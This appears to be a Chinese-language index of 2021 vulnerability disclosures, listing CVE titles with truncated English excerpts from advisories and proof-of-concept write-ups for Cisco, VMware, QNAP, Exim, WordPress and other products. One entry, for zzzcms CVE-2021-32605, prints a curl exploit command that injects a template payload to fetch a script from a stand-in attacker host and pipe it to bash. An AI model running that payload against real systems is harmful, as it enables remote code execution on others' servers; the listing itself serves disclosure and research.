Apache Solr SSRF漏洞 (CVE-2021-27905)

...

Microsoft Hyper-V 远程代码执行漏洞（CVE-2021-28476）

CVE-2021-28476: a guest-to-host "Microsoft Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys. This is a proof of concept for CVE-2021-28476 "Hyper-V Remote Code Execution Vulnerability", an arbitrary memory read in vmswitch.sys Network virtualization service provider patched by Microso...

QNAP Music Station/Malware Remover未授权远程代码执行漏洞（CVE-2020-36197 CVE-2020-36198）

QNAP MusicStation/MalwareRemover Pre-Auth Remote Code Execution Summary QNAP MusicStation and MalwareRemover official apps are affected by an arbitrary file upload and a command injection vulnerabilities, leading to pre-auth remote root command execution. Product description from vendor “QNAP...

SolarWinds Orion 远程代码执行漏洞（CVE-2021-31474）

...

VMware vCenter Server远程代码执行漏洞（CVE-2021-21985）

Rapid7 May 26, 2021 5:34pm UTC 1 day ago• Last updated May 27, 2021 6:39pm UTC 7 hours ago Technical Analysis Threat status: Impending threat Attacker utility: Network infrastructure compromise Description On Tuesday, May 25, 2021, VMware published security advisory VMSA-2021-0010, which includes...

ESXi OpenSLP堆溢出漏洞（CVE-2021-21974）

My RCE PoC walkthrough for CVE-2021–21974 VMware ESXi OpenSLP heap-overflow vulnerability Introduction During a recent engagement, I discovered a machine that is running VMware ESXi 6.7.0. Upon inspecting any known vulnerabilities associated with this version of the software, I identified it may ...

腾达 TendaN4 未授权访问漏洞（CNVD-2021-24481）

...

Cisco HyperFlex HX 未授权文件上传漏洞（CVE-2021-1499 ）

Technical Analysis CVE-2021-1499 Arbitrary file upload RCE implied in the /upload endpoint. Patch --- unpatched/springpath.conf 2021-05-17 19:06:17.000000000 -0500 +++ patched/springpath.conf 2021-05-17 19:06:23.000000000 -0500 @@ -36,14 +36,7 @@ include uwsgiparams; - location /crossdomain.xml -...

Cisco HyperFlex HX 未授权命令注入漏洞（CVE-2021-1497 CVE-2021-1498）

CVE-2021-1497 and/or CVE-2021-1498 Command injection in the /storfs-asup endpoint’s token and mode parameters. Patch --- unpatched/web.xml 2021-05-17 19:06:17.000000000 -0500 +++ patched/web.xml 2021-05-17 19:06:23.000000000 -0500 @@ -69,17 +69,6 @@ - Springpath Storfs ASUP -...

H3C IMC 远程命令执行漏洞

...

Exim 4 远程代码执行漏洞（CVE-2020-28018）

CVE-2020-28018: Exim Use-after-free UAF leading to RCE Introduction There exists a Use-after-free UAF vulnerability in tls-openssl.c that allow remote unauthenticated attackers to corrupt internal memory data, thus finally achieving remote code execution. Primitives: - x Memory Leakage - x...

Pega Infinity登陆绕过漏洞（CVE-2021-27651）

Summary An attacker can bypass all stages of the password reset flow and reset any user's account on Pega infinity. This is done by 1 initiating the password reset flow and typing in the victim email, then 2 forcing the HTTP POST request to update the password through. An attacker could login usi...

XStream远程代码执行漏洞（CVE-2021-29505）

CVE-2021-29505 Vulnerability CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack. Affected Versions All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's...

泛微OA weaver.common.Ctrl 任意文件上传漏洞

...

Cisco RV34x系列 授权远程代码执行漏洞（CVE-2021-1413 CVE-2021-1414 CVE-2021-1415）

...

Cisco RV34X系列 权限提升漏洞（CVE-2021-1520）

Advisory: Cisco RV34X Series - Privilege Escalation in vpnTimer May 5, 2021 |In Research |By [email protected] TL;DR A few weeks ago, we published an advisory on the Cisco RV series routers, where we outlined the root cause for authentication bypass and remote command execution issues...

蓝海卓越计费管理系统任意文件下载

...

Foxit Reader 远程代码执行漏洞（CVE-2021-31473）

...

HTTP协议栈远程代码执行漏洞（CVE-2021-31166）

...

Microsoft Azure Virtual Machine信息泄露漏洞（CVE-2021-27075）

CVE-2021-27075: Microsoft Azure Vulnerability Allows Privilege Escalation and Leak of Private Data Written by Paul Litvak - 11 May 2021 In this post I will explain how the Microsoft Azure Virtual Machine VM extension works and how we found a fatal vulnerability in the extension mechanism affectin...

zzzcms zzzphp parserIfLabel模板注入远程执行代码漏洞（CVE-2021-32605）

curl -b 'keys=if:=curl http://attacker.tld/poc.sh|bashend if' 'http://target.tld/?location=search'...

Open Distro for Elasticsearch SSRF漏洞（CVE-2021-31828）

SSRF in Open Distro for Elasticsearch CVE-2021-31828 Rotem Bar Published on May 11, 2021 7 min read After an interesting adventure, it's now possible to announce a new CVE-2021-31828 which effects Open Distro for ElasticSearch ODFE , versions until 1.12.0.2. Open Distro is a plugin for...

Ivanti Avalanche目录遍历漏洞

SSD Advisory – Ivanti Avalanche Directory Traversal May 11, 2021 SSD Disclosure / Technical Lead Uncategorized TL;DR Find out how a directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the ‘image’ folder. Vulnerability Summar...

蜂网互联企业级路由器逻辑漏洞

...

VoIPMonitor未授权远程代码执行漏洞（CVE-2021-30461）

SSD Advisory – VoIPmonitor UnAuth RCE May 6, 2021 SSD Disclosure / Technical Lead Uncategorized TL;DR Find out how a vulnerability in VoIPmonitor allows an unauthenticated attacker to execute arbitrary code. Vulnerability Summary VoIPmonitor is “open source network packet sniffer with commercial...

Microsoft Exchange Server远程执行代码漏洞（CVE-2021-28482）

...

蓝凌OA前台任意文件读取漏洞

...

wordpress 5.7 授权XXE漏洞（CVE-2021-29447）

WordPress 5.7 XXE Vulnerability BY KARIM EL OUERGHEMMI|APRIL 26, 2021 At SonarSource, we are constantly improving our code analyzers and security rules. We recently improved our PHP security engine to detect more OWASP Top 10 and CWE Top 25 issue types. When testing our new analyzers against some...

NETGEAR R7000 缓冲区溢出漏洞（CVE-2021-31802）

SSD Advisory – NETGEAR Nighthawk R7000 httpd PreAuth RCE April 26, 2021 SSD Disclosure / Technical Lead Uncategorized TL;DR Find out how a vulnerability in NETGEAR R7000 allows an attacker to run arbitrary code without requiring authentication with the device. Vulnerability Summary A vulnerabilit...

Apache OFBiz 代码执行漏洞（CVE-2021-30128）

...

用友U8 SQL注入漏洞

...

金山V8 终端安全系统命令执行漏洞

...

用友 NCCloud FS文件管理SQL注入漏洞

...

金山 V8 终端安全系统 任意文件读取漏洞

...

若依CMS 未授权访问漏洞

...

若依CMS 任意文件读取漏洞

...

weblogic 代码执行漏洞（CVE-2021-2135）

...

Microsoft SharePoint信息泄露漏洞（CVE-2020-17120）

...

cisco RV34X系列身份绕过和远程命令执行漏洞（CVE-2021-1472 CVE-2021-1473）

Advisory: Cisco RV34X Series – Authentication Bypass and Remote Command Execution APRIL 13, 2021 TL;DR In early 2021, we reported a few security issues to Cisco related to their RV34X series of routers, two of which have been recently patched. The issues in question were an authentication bypass...

ubuntu特权提升漏洞（CVE-2021-3493）

...

weblogic T3反序列化漏洞

...

Askey RTF3505VW RCE漏洞（CVE-2020–28695）

...

eyouCMS RCE漏洞

...

Chrome 远程代码执行漏洞

...

Chrome 远程代码执行漏洞（CVE-2021-21220）

...

亿邮电子邮件系统远程命令执行漏洞（CNVD-2021-26422）

...

致远OA thirdpartyController.do 未授权RCE漏洞

...

网康 NS-NGFW RCE漏洞

...

蓝凌OA 后台任意文件写入漏洞

...

Cisco SD-WAN vManage 缓冲区溢出漏洞（CVE-2021-1479）

...